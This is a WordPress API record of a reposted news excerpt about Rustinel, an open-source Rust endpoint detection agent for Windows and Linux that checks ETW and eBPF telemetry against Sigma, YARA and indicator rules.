{"id":243379,"date":"2026-05-11T01:30:00","date_gmt":"2026-05-11T05:30:00","guid":{"rendered":"https:\/\/news-you-need.com\/index.php\/2026\/05\/11\/rustinel-open-source-endpoint-detection-for-windows-and-linux\/"},"modified":"2026-05-11T01:35:08","modified_gmt":"2026-05-11T05:35:08","slug":"rustinel-open-source-endpoint-detection-for-windows-and-linux","status":"publish","type":"post","link":"https:\/\/news-you-need.com\/index.php\/2026\/05\/11\/rustinel-open-source-endpoint-detection-for-windows-and-linux\/","title":{"rendered":"Rustinel: Open-source endpoint detection for Windows and Linux"},"content":{"rendered":"<p><a href=\"https:\/\/www.helpnetsecurity.com\/2026\/05\/11\/rustinel-open-source-endpoint-detection-windows-linux\/\">Rustinel: Open-source endpoint detection for Windows and Linux<\/a><\/p>\n<p><a href=\"https:\/\/www.helpnetsecurity.com\/2026\/05\/11\/rustinel-open-source-endpoint-detection-windows-linux\/\">https:\/\/www.helpnetsecurity.com\/2026\/05\/11\/rustinel-open-source-endpoint-detection-windows-linux\/<\/a><\/p>\n<p>Publish Date: <a href=\"publish_date]\">2026-05-11 01:30:00<\/a><\/p>\n<p>Source Domain: <a href=\"www.helpnetsecurity.com\">www.helpnetsecurity.com<\/a><\/p>\n<p>Open-source endpoint detection has long been split between Windows-focused tools built around Sysmon and Linux tools built around eBPF or auditd. Defenders running mixed environments have had to stitch together separate pipelines, separate rule sets, and separate maintenance burdens. Rustinel, a Rust-based endpoint agent, is an attempt to collapse that work into a single codebase.<\/p>\n<\/p>\n<h3>A single agent across two operating systems<\/h3>\n<p>Rustinel collects telemetry through ETW on Windows and eBPF on Linux, normalizes the events into a shared model, and evaluates them against Sigma rules, YARA signatures, and atomic indicators of compromise. Alerts are written to disk as ECS-compatible NDJSON, a format that is easy to ship, parse, and integrate into SIEM or log-analysis pipelines such as Elastic or Splunk.<\/p>\n<p>Windows coverage spans process creation, image load, network, file, registry, DNS, PowerShell, WMI, service, and scheduled task events. Linux coverage currently includes process, network, file, and DNS telemetry. According to the project, Windows coverage remains broader for now, with Linux eBPF support continuing to expand.<\/p>\n<p>The agent runs in user mode on both platforms. On Windows it can be installed as a service. On Linux it requires kernel 5.8 or newer with BTF support and runs under root or a supervisor of the operator\u2019s choice. Active response is optional and can be set to dry-run, with allowlists that exempt trusted paths.<\/p>\n<h3>A user-mode design choice<\/h3>\n<p>Most commercial EDR products ship a kernel driver to obtain early visibility and tamper resistance. Rustinel takes a different path. Author Th\u00e9o Foucher said the choice was deliberate.<\/p>\n<p>\u201cMost commercial EDRs rely on a kernel driver for good reasons: tamper resistance, early visibility, and the ability to observe or block some activity before user-mode components see it. With Rustinel, I made a different design choice: stay as simple, transparent, and stable as possible while still collecting useful host&#8230;<\/p>\n<p><a href=\"https:\/\/www.helpnetsecurity.com\/2026\/05\/11\/rustinel-open-source-endpoint-detection-windows-linux\/\">Source<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Rustinel: Open-source endpoint detection for Windows and Linux https:\/\/www.helpnetsecurity.com\/2026\/05\/11\/rustinel-open-source-endpoint-detection-windows-linux\/ Publish Date: 2026-05-11 01:30:00 Source Domain:&#8230;<\/p>\n","protected":false},"author":1,"featured_media":243382,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/img.helpnetsecurity.com\/wp-content\/uploads\/2026\/05\/05161542\/rustinel-1500.webp","fifu_image_alt":"","footnotes":""},"categories":[48],"tags":[71],"class_list":["post-243379","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-linux","tag-linux"],"_links":{"self":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/243379"}],"collection":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/comments?post=243379"}],"version-history":[{"count":1,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/243379\/revisions"}],"predecessor-version":[{"id":243384,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/243379\/revisions\/243384"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/media\/243382"}],"wp:attachment":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/media?parent=243379"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/categories?post=243379"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/tags?post=243379"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}